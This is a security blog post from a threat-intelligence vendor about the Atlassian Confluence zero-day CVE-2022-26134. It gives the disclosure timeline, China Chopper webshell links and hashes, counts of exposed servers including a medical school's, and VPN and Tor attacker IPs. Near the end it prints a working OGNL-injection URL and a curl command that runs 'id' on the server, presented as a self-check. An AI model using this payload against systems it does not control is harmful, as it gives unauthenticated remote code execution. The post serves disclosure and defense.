According to Volexity 1), a cybersecurity company based in Washington, DC, a webshell was discovered in the Atlassian Confluence server during an incident response investigation. Initially believed to be an issue specific to Atlassian Confluence, Volexity developed an exploit code. However, further analysis revealed that the vulnerability was a zero-day exploit capable of executing remote code, even after applying the latest patch. Volexity reported the issue to Atlassian on May 31 (PDT).

After receiving the issue report and confirming it as a zero-day vulnerability, Atlassian released a security advisory regarding the critical unauthenticated remote code execution on June 3 (PDT). Volexity has also published a blog post and a tweet regarding the discovery.

1)Volexity’s CTO Michael Hale Ligh is one of the authors of the world-famous cybersecurity book, Malware Analyst’s Cookbook.
Volexity's Twitter post on the Atlassian Confluence zero-day vulnerability
Volexity’s Twitter post on the Atlassian Confluence zero-day vulnerability

Timeline of zero-day vulnerability in Atlassian Confluence

  • May 31: Volexity found zero-day vulnerability in Atlassian Confluence.
  • June 2, 1 p.m.: Atlassian and Volexity officially issued a security advisory for CVE-2022-26134 Vulnerability.
  • June 3, 8 a.m.: Atlassian announced how to mitigate vulnerabilities without security patches.
  • June 3, 8 p.m.: Atlassian released security updates to address vulnerabilities.

(All times are in PDT)

Webshell Used in MS Exchange Server attacks

According to Volexity’s Analysis Report, the CVE-2022-26134 vulnerability can be exploited by an attacker to upload the China Chopper webshell. This notorious securityvulnerability issue was previously utilized during the Microsoft Exchange Server crisis and is believed to be the creation of the Chinese hacking group Hafnium. If the attacker successfully penetrates the server and deploys this webshell, it grants them unrestricted access, even if the zero-day security patch is up to date.

GitHub Link, known as the China Chopper Webshell
https://github.com/tennc/webshell/blob/master/caidao-shell/%E8%8F%9C%E5%88%80jsp%E4%BF%AE%E6%94%B9.jsp

Other Webshells
md5: ea18fb65d92e1f0671f23372gf60e7
sha1 : 80b327ec19c7d14cc10511060ed3a4abffc821af

Scan results on VirusTotal
https://www.virustotal.com/gui/file/5f3d46a5d18c25c7ee63f6bbe9af930d3be44f541625363a029f23de25cd36ae

MITRE ATT&CK’s information on China Chopper
https://attack.mitre.org/software/S0020

Confluence Servers Still Exposed to the Internet

Despite a zero-day attack that that took place during the Memorial Day holidays in the United States, Atlassian has responded promptly by releasing security patches. However, the major concern lies in the large number of Confluence servers still connected to the internet. Similar to the situation with the Microsoft Exchange Server incident, there are servers that have not received updates or patches for months, leaving them susceptible and exposed to potential threats on the internet.

The CIP team at AI Spera utilized Criminal IP to determine the number of Atlassian Confluence servers that are currently connected to the internet. Through Element Analysis, users can access country-specific statistics on the exposure of Confluence on the internet by applying the tech_stack filter for “Atlassian Confluence”.

tech_stack: “Atlassian Confluence”

Search results for tech_stack: "Atlassian Confluence" on Element Analysis
Search results for tech_stack: “Atlassian Confluence” on Element Analysis

The screenshot above shows that more than 5,600 Confluence servers have been installed in 70 countries on the internet. Upon conducting individual IP address checks using Criminal IP’s Asset Search, the CIP Team discovered that these servers were exposed to the internet without proper defense measures, with Confluence installed.

Exposed Confluence Server Found by Criminal IP Asset Search
Exposed Confluence Server Found by Criminal IP Asset Search
Exposed Confluence Server Found by Criminal IP Asset Search
Exposed Confluence Server Found by Criminal IP Asset Search

What makes it even more problematic is the significant presence of actual companies or institutions among these IP addresses. While investigating the ASN names of the IP addresses reveals that most of them are associated with cloud servers like AWS, MS Azure, Google, and others, it is important to note that this is simply an indication of organizations or companies using cloud services. Furthermore, even if the HTML titles displayed in the dashboard below suggest the usage of cloud servers, it is still possible to infer the affiliation with a specific company or institution.

ASN Name statistics of the exposed Confluence servers discovered in Criminal IP
ASN Name statistics of the exposed Confluence servers discovered in Criminal IP

Since these wiki systems do not have a large number of servers but only one or two, it is advisable to prioritize sorting the search results based on the low number of occurrences when investigating the ASN Names associated with an IP address. This approach allows for a more specific understanding of the results, focusing on cases where only 1 or 2 results are returned. For example, even if only one occurrence is detected, an ASN Name that includes ‘university of XXX’ could indicate IP addresses used by educational institutions, possibly representing Confluence servers installed in research laboratories within those universities.

IP addresses used by universities found among the exposed Confluence servers identified through the ASN Name
IP addresses used by universities found among the exposed Confluence servers identified through the ASN Name

As the screenshot below shows, the Confluence of a medical school in the United States has been found on the internet. Worse, all of the information is publicly available without any login authentication.

The exposed Confluence of the U.S. Medical School searched by Criminal IP. The information is disclosed without login authentication.
The exposed Confluence of the U.S. Medical School searched by Criminal IP. The information is disclosed without login authentication.

Analysis of Attack IP Addresses

According to the IOC released by Volexity, 15 IP addresses were identified as interacting with webshells on the Confluence server following the initial Confluence attack. Upon analyzing these IP addresses using Criminal IP, it was discovered that five were associated with using VPN services. Nowadays, attackers who engage in zero-day or APT attacks often use VPN services instead of IP addresses with high malicious indexes. This trend highlights the need for companies to detect VPN IP addresses for inbound traffic, as more attackers are expected to utilize VPNs to cover their tracks when traversing pre-compromised servers.

Below are the IP addresses tagged as VPN in Criminal IP. In addition, one Tor IP address has also been identified.

156.146.56.136 VPN
198.147.22.148 VPN
59.163.248.170 VPN
64.64.228.239 VPN
66.115.182.102 VPN
66.115.182.111 VPN

156.146.34.9 Tor

Analysis of one IP address from the Confluence breach case by Volexity: identified as a VPN IP in Criminal IP
Analysis of one IP address from the Confluence breach case by Volexity: identified as a VPN IP in Criminal IP

How to Check for Vulnerabilities

If you are a Confluence user accessing it through a web browser on your PC, you can use the following command with a curl or Python script to check for vulnerabilities on your Confluence server. Even if you are not an information security officer, there is a way to assess vulnerabilities in your company’s Confluence. Follow this method and promptly request patches from your security department.

https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/

If you modify the Confluence address and use the curl command, as shown below, you can perform the check. If the X-Cmd-Response header value displays the uid, gid, and group of the Confluence server, it indicates that the server is vulnerable to CVE-2022-26134.

curl -v -k –head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response

Conclusion

On June 3, 2022, Atlassian released a patch for CVE-2022-26134, addressing the vulnerability. However, organizations may face challenges in shutting down servers for security updates, considering the widespread use of Confluence as a collaborative wiki system. In such cases, Atlassian provides a manual solution specifically for addressing security issues, and it is recommended to follow Atlassian’s recommendations to take appropriate action.

Zero-day attacks have prompted suppliers to work on security updates actively. However, unlike many other cases, vulnerabilities in web-based systems are easily exploited from the outside without complicated conditions as soon as a zero-day vulnerability is discovered. Furthermore, additional security checks are necessary if a webshell backdoor has already been uploaded, as hackers may have established a pathway for unauthorized access even after patching the system.

When remote code execution vulnerabilities leveraging zero-day exploits arise, a pattern emerges where webshell backdoors become prevalent. As a result, webshell attacks, similar to the Microsoft Exchange and Confluence incidents, are expected to persist in the future.

It is worth noting that Confluence has experienced zero-day attacks in the past. While Confluence is a widely recognized system, it is also a prime target for cyber attacks due to the concentration of valuable information from companies and institutions. Therefore, the initial step for organizations using Confluence is promptly blocking external access to their Confluence server. In addition, regular monitoring and assessments of the attack surface should also be conducted to prevent critical information management systems from being exposed externally.


Source: Criminal IP (www.criminalip.io)